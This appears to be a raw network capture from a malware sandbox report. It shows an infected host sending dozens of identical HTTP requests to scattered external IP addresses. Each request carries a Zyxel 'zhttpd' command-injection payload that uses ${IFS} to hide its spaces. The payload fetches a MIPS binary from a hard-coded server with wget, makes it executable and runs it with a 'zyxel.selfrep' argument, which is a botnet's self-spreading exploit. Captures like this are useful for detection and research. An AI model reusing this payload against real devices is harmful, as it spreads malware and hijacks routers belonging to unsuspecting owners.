                                                        Jan 28, 2024 10:12:43.222425938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2060192.168.2.1452182144.244.17.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222482920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2061192.168.2.1435294218.154.132.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222532988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2062192.168.2.145150698.179.243.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222570896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2063192.168.2.1445384180.119.157.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222618103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2064192.168.2.1447860199.236.242.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222646952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2065192.168.2.1459524153.135.193.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222691059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2066192.168.2.1440878183.144.193.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222708941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2067192.168.2.1452254156.161.76.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222747087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2068192.168.2.144707859.137.140.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222788095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2069192.168.2.14591868.170.95.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222836018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2070192.168.2.14427644.53.38.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222872019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2071192.168.2.1451038218.135.171.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222902060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2072192.168.2.1457056185.11.60.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222942114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2073192.168.2.144169490.249.68.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222985029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2074192.168.2.144264275.229.20.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223043919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2075192.168.2.1440098213.168.150.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223073006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2076192.168.2.1437236109.192.141.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223103046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2077192.168.2.1439894139.188.30.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223125935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2078192.168.2.143665445.96.253.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223160028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2079192.168.2.1444702104.123.59.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223193884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2080192.168.2.1443452102.203.118.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223227024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2081192.168.2.1451316126.167.16.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223259926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2082192.168.2.1433186106.144.212.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223320961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2083192.168.2.1458570201.131.216.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223339081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2084192.168.2.145996049.210.200.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223362923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2085192.168.2.1445638162.235.27.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223396063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2086192.168.2.14599684.22.186.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223428965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2087192.168.2.145673080.199.188.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223481894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2088192.168.2.1439398174.16.11.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223509073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2089192.168.2.1444658103.255.122.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223547935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2090192.168.2.1460950105.250.98.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223573923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2091192.168.2.144922282.228.229.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223618031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2092192.168.2.1435272218.63.43.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223645926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2093192.168.2.144250031.176.229.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223675966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2094192.168.2.1456744216.173.73.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223709106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2095192.168.2.145331487.144.14.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223773003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2096192.168.2.1447112162.128.152.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223788977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2097192.168.2.1441200220.239.224.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223845005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2098192.168.2.144413471.237.65.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223881006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2099192.168.2.1452188112.49.156.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223921061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2100192.168.2.1443812131.228.205.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.223962069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2101192.168.2.1459478121.92.32.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224011898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2102192.168.2.1460974125.58.185.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224041939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2103192.168.2.143310841.6.100.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224083900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2104192.168.2.145024690.83.216.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224127054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2105192.168.2.145113465.177.43.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224153042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2106192.168.2.145845273.119.19.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224184036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2107192.168.2.1434818109.89.222.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224231005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2108192.168.2.145732069.99.185.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224262953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2109192.168.2.14531045.4.203.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224294901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2110192.168.2.14463045.76.76.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224323034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2111192.168.2.145778025.23.249.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224373102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2112192.168.2.1448870197.243.201.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224420071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2113192.168.2.1446586131.217.139.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224451065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2114192.168.2.1449862211.35.122.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224493027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2115192.168.2.1450596219.17.218.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224534988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2116192.168.2.1432934129.189.205.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224565983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2117192.168.2.145999896.132.96.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224600077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2118192.168.2.1450902125.86.90.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224656105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2119192.168.2.145251653.76.217.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.224680901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2120192.168.2.1441566128.195.13.179443
                                                        TimestampBytes transferredDirectionData
